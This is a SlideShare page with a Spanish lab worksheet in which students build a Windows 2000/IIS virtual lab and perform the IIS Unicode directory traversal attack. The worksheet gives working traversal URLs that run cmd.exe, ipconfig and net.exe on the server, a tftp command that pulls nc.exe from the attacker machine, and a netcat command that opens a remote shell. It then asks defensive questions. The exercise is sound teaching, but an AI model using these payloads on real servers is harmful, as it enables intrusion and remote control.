SlideShare una empresa de Scribd logo

Seguridad: Ataque UNICODE

Francesc Perez
Francesc Perez
Educación
1 de 3
Descargar para leer sin conexión
1. Instale VMWARE7 de forma típica 2. Instale Windows 2000 Server en una máquina virtual con las opciones por defecto. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 3. Una vez instalado el servidor abra su navegador y en URL introduzca http://localhost 1. ¿Tiene instalado el servidor web de Windows? ¿Qué nombre recibe? 2. ¿Qué versión es? 3. ¿Hay algún antivirus o Host IDS instalado? 4. Instale Windows 2000 Professional en otra máquina virtual. Cuando elija el tamaño de disco utilizado sustituya 40GB por 2GB! 5. El escenario que se quiere emular es el de la figura. Ataque UNICODE Francesc Pérez Fdez. 6. Desde MSDOS averigüe la IP del cliente y del servidor, haga un test de conectividad y verifique que se ven a nivel de capa 3. ¿Qué comandos ha utilizado? 7. Haga un barrido de puertos desde el cliente al servidor. ¿Qué programa ha utilizado? ¿En qué puertos el servidor espera peticiones? ¿A qué aplicaciones pertenecen dichos puertos y cuál es su función?
8. Desde el cliente haga un telnet al servidor por el puerto 80. ¿Qué comando ha utilizado? Pulse “enter” dos veces consecutivamente. ¿Qué mensaje muestra la salida de este comando? ¿Qué tipo y versión de servidor web está en ejecución en el servidor? 9. Busque en Internet información sobre el ataque UNICODE y descríbalo. ¿Se ajusta este ataque al escenario planteado? 10. Ataque: a. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c: ¿Qué muestra el servidor? b. Desde el navegador del cliente ir a Ataque UNICODE Francesc Pérez Fdez. b. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all ¿Qué muestra el servidor? c. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view ¿Qué muestra el servidor? d. Cree una carpeta compartida en el servidor. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view+IP_SER VER ¿Qué muestra el servidor? e. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/nbtstat.exe?+"- a"+IP_SERVER ¿Qué muestra el servidor?
10. Ataque: f. Instale el servidor TFTP en el cliente y copie en la carpeta el programa nc.exe que nos permitirá tener una shell remota en el servidor. g. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/tftp.exe?"- i"+IP_CLIENTE+GET+nc.exe ¿Qué muestra el servidor? ¿Qué hemos hecho en este paso? Mire el contenido de la carpeta C:/Inetpub/scripts. Copie el resto de archivos de la carpeta de nc11nt, en caso contrario no funcionará! h. Ejecutaremos de forma remota la herramienta nc.exe desde el cliente. Para ello ir al navegador del cliente e introducir en la URL http://IP_SERVER/scripts/nc.exe?- l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el Ataque UNICODE Francesc Pérez Fdez. l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el puerto 80, que se quede en modo listening (esperando conexión entrante) y que después de la conexión se ejecute el programa cmd.exe i. Desde un cmd del cliente ejecute “nc IP_SERVER 80”. ¿Qué muestra la salida de dicho comando? ¿Dónde se encuentra? 11. ¿Solucionaría poner un firewall entre el cliente y el servidor? Explique por qué. 12. Dibuje con Edraw o Visio una arquitectura de red con los dispositivos software y hardware necesarios para crear un acceso seguro al servidor un detectar ataques UNICODE. Explique la función de cada elemento.

Recomendados

Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Practica 5 IRDT
Practica 5 IRDTPractica 5 IRDT
Practica 5 IRDTERIKLOPEZ97
 
Uso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloUso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloCristian Fory
 
Irdt practica 5
Irdt practica 5Irdt practica 5
Irdt practica 5galajainthemoon
 
Actividad n° 05
Actividad n° 05Actividad n° 05
Actividad n° 05Elky Rubí Mostacero
 
LEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSLEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSIsaac Huashua Huarcaya
 
Practica 3 irdt
Practica 3 irdtPractica 3 irdt
Practica 3 irdtgalajainthemoon
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 

Recomendados

Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Practica 5 IRDT
Practica 5 IRDTPractica 5 IRDT
Practica 5 IRDTERIKLOPEZ97
 
Uso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloUso de packet tracer para ver las unidades de datos del protocolo
Uso de packet tracer para ver las unidades de datos del protocoloCristian Fory
 
Irdt practica 5
Irdt practica 5Irdt practica 5
Irdt practica 5galajainthemoon
 
Actividad n° 05
Actividad n° 05Actividad n° 05
Actividad n° 05Elky Rubí Mostacero
 
LEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSLEVANTAR SERVIDOR FTP EN CENTOS
LEVANTAR SERVIDOR FTP EN CENTOSIsaac Huashua Huarcaya
 
Practica 3 irdt
Practica 3 irdtPractica 3 irdt
Practica 3 irdtgalajainthemoon
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
N i-k-t-o
N i-k-t-oN i-k-t-o
N i-k-t-oRafael Ibarra Alvarez
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosBenjamin Ortiz
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windowsROLO36
 
Nikto
Nikto Nikto
Nikto Rafael Ibarra Alvarez
 
Sockets tcp
Sockets tcpSockets tcp
Sockets tcpjacquelinemonjaraz
 
Nesuss sebastianm98
Nesuss sebastianm98Nesuss sebastianm98
Nesuss sebastianm98Sebastian Mayorga
 
Acceso remoto vnc
Acceso remoto vncAcceso remoto vnc
Acceso remoto vncperla guerrero
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...Agencia Aduanera Almeida
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLabFIB
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]David García Lopez
 
Practica#12
Practica#12Practica#12
Practica#12Violetita Pesantez Jimenez
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxyalfredoariasjimenez
 
Practica 1
Practica 1Practica 1
Practica 1Julio Padilla
 
Practica 1
Practica 1Practica 1
Practica 1Julio Padilla
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpirisfjpiris
 
Práctica 11
Práctica 11Práctica 11
Práctica 11ManixGames
 
Servidorweb
ServidorwebServidorweb
ServidorwebGabriel Sumoza
 
Requisitos jin
Requisitos jinRequisitos jin
Requisitos jinGina Rodriguez Cando
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdtERIKLOPEZ97
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerAlejandro Moreno
 

Más contenido relacionado

La actualidad más candente

Práctica 11
Práctica 11Práctica 11
Práctica 11AlbertoDD
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosBenjamin Ortiz
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windowsROLO36
 

La actualidad más candente (8)

Práctica 11
Práctica 11Práctica 11
Práctica 11
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bis
 
N i-k-t-o
N i-k-t-oN i-k-t-o
N i-k-t-o
 
Unidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmosUnidad iii seguridad de redes bmos
Unidad iii seguridad de redes bmos
 
Practica 5 comando netstat en windows
Practica 5 comando netstat en windowsPractica 5 comando netstat en windows
Practica 5 comando netstat en windows
 
Nikto
Nikto Nikto
Nikto
 
Sockets tcp
Sockets tcpSockets tcp
Sockets tcp
 
Nesuss sebastianm98
Nesuss sebastianm98Nesuss sebastianm98
Nesuss sebastianm98
 

Similar a Seguridad: Ataque UNICODE

188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...Agencia Aduanera Almeida
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLabFIB
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]David García Lopez
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxyalfredoariasjimenez
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpirisfjpiris
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdtERIKLOPEZ97
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerAlejandro Moreno
 
Ejercicio windows7 repaso
Ejercicio windows7 repasoEjercicio windows7 repaso
Ejercicio windows7 repasoemiliojromero
 
Manual elastix1
Manual elastix1Manual elastix1
Manual elastix1paulhigv
 
Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1MARYNECHAN31
 

Similar a Seguridad: Ataque UNICODE (20)

Acceso remoto vnc
Acceso remoto vncAcceso remoto vnc
Acceso remoto vnc
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
 
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+DinLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
inLab FIB MeteorJS workshop by uLab UPC - Telefonica I+D
 
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
Instalación de Windows Sever 2016 (Máquina Virtual) [Con configuración DNS]
 
Practica#12
Practica#12Practica#12
Practica#12
 
Instalacion de un servidor proxy
Instalacion de un servidor proxyInstalacion de un servidor proxy
Instalacion de un servidor proxy
 
Practica 1
Practica 1Practica 1
Practica 1
 
Practica 1
Practica 1Practica 1
Practica 1
 
Memoria sere jpiris
Memoria sere jpirisMemoria sere jpiris
Memoria sere jpiris
 
Práctica 11
Práctica 11Práctica 11
Práctica 11
 
Servidorweb
ServidorwebServidorweb
Servidorweb
 
Requisitos jin
Requisitos jinRequisitos jin
Requisitos jin
 
Practica 11 irdt
Practica 11 irdtPractica 11 irdt
Practica 11 irdt
 
Creando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu ServerCreando un servidor virtual con Ubuntu Server
Creando un servidor virtual con Ubuntu Server
 
Ejercicio windows7 repaso
Ejercicio windows7 repasoEjercicio windows7 repaso
Ejercicio windows7 repaso
 
Manual elastix1
Manual elastix1Manual elastix1
Manual elastix1
 
Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1Conexión remota con go tomypc equipo #1
Conexión remota con go tomypc equipo #1
 
Nagios
NagiosNagios
Nagios
 
Herramientas de-diagnostico-y-monitoreo
Herramientas de-diagnostico-y-monitoreoHerramientas de-diagnostico-y-monitoreo
Herramientas de-diagnostico-y-monitoreo
 
Presentacion buena trabajo largo
Presentacion buena trabajo largoPresentacion buena trabajo largo
Presentacion buena trabajo largo
 

Más de Francesc Perez

Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPFrancesc Perez
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónFrancesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Francesc Perez
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solFrancesc Perez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorFrancesc Perez
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3Francesc Perez
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicasFrancesc Perez
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleFrancesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleFrancesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaFrancesc Perez
 
La fuente de alimentación
La fuente de alimentación La fuente de alimentación
La fuente de alimentación Francesc Perez
 

Más de Francesc Perez (20)

ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Seguridad: Backtrack1
Seguridad: Backtrack1Seguridad: Backtrack1
Seguridad: Backtrack1
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación La fuente de alimentación
La fuente de alimentación
 

Último

III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docx
III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docxIII SEGUNDO CICLO PLAN DE TUTORÍA 2024.docx
III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docxMaritza438836
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicialLorenaSanchez350426
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsxJuanpm27
 
Abregú, Podestá. Directores.Líderes en Acción.
Abregú, Podestá. Directores.Líderes en Acción.Abregú, Podestá. Directores.Líderes en Acción.
Abregú, Podestá. Directores.Líderes en Acción.profandrearivero
 
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docxMagalyDacostaPea
 
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADO
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADOFICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADO
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADOMARIBEL DIAZ
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfssuser50d1252
 
HISPANIDAD - La cultura común de la HISPANOAMERICA
HISPANIDAD - La cultura común de la HISPANOAMERICAHISPANIDAD - La cultura común de la HISPANOAMERICA
HISPANIDAD - La cultura común de la HISPANOAMERICAJesus Gonzalez Losada
 
describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...DavidBautistaFlores1
 
libro grafismo fonético guía de uso para el lenguaje
libro grafismo fonético guía de uso para el lenguajelibro grafismo fonético guía de uso para el lenguaje
libro grafismo fonético guía de uso para el lenguajeKattyMoran3
 
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI Tarea 4_ Foro _Incorporar habilidades de Siglo XXI
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI Manuel Molina
 
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIA
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIAGUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIA
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIAELIASPELAEZSARMIENTO1
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOMARIBEL DIAZ
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOEveliaHernandez8
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfssuser50d1252
 
05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdfRAMON EUSTAQUIO CARO BAYONA
 
los cinco reinos biologicos 0 de los seres vivos
los cinco reinos biologicos 0 de los seres vivoslos cinco reinos biologicos 0 de los seres vivos
los cinco reinos biologicos 0 de los seres vivosOrdinolaSernaquIrene
 

Último (20)

III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docx
III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docxIII SEGUNDO CICLO PLAN DE TUTORÍA 2024.docx
III SEGUNDO CICLO PLAN DE TUTORÍA 2024.docx
 
TL/CNL – 2.ª FASE .
TL/CNL – 2.ª FASE .TL/CNL – 2.ª FASE .
TL/CNL – 2.ª FASE .
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicial
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
 
Abregú, Podestá. Directores.Líderes en Acción.
Abregú, Podestá. Directores.Líderes en Acción.Abregú, Podestá. Directores.Líderes en Acción.
Abregú, Podestá. Directores.Líderes en Acción.
 
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
 
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADO
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADOFICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADO
FICHA PL PACO YUNQUE.docx PRIMARIA CUARTO GRADO
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
 
HISPANIDAD - La cultura común de la HISPANOAMERICA
HISPANIDAD - La cultura común de la HISPANOAMERICAHISPANIDAD - La cultura común de la HISPANOAMERICA
HISPANIDAD - La cultura común de la HISPANOAMERICA
 
describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...
 
VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL _VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL _
 
libro grafismo fonético guía de uso para el lenguaje
libro grafismo fonético guía de uso para el lenguajelibro grafismo fonético guía de uso para el lenguaje
libro grafismo fonético guía de uso para el lenguaje
 
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI Tarea 4_ Foro _Incorporar habilidades de Siglo XXI
Tarea 4_ Foro _Incorporar habilidades de Siglo XXI
 
Sesión La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdfSesión La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdf
 
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIA
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIAGUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIA
GUIA DE TEXTOS EDUCATIVOS SANTILLANA PARA SECUNDARIA
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
 
05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf
 
los cinco reinos biologicos 0 de los seres vivos
los cinco reinos biologicos 0 de los seres vivoslos cinco reinos biologicos 0 de los seres vivos
los cinco reinos biologicos 0 de los seres vivos
 

Seguridad: Ataque UNICODE

